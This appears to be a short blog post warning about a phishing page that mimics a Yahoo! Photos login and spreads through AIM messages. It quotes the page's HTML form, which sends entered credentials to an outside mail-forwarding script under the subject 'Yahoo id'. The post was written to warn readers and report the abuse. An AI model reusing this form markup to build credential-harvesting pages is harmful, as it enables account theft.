This URL is being sent around via IM. It’s a very convincing page that looks like a login for Yahoo! Photos, being circulated by what I suspect is a virus/trojan that uses AIM to propagate as I received this URL via an IM from someone I knew.
Looking at the page’s source (as I was skeptical about having to log into Yahoo! Photos at a geocities.com URL), I found:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> <INPUT TYPE="hidden" NAME="Mail_To" VALUE="firstname.lastname@example.org"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
Decoding that form ACTION, it is the following URL:
This Geocities page needs to be shut down ASAP before too many people get their Yahoo! accounts compromised. I’ve already sent a message to Yahoo! via it’s abuse web contact form. But, keep on the lookout for this kind of thing.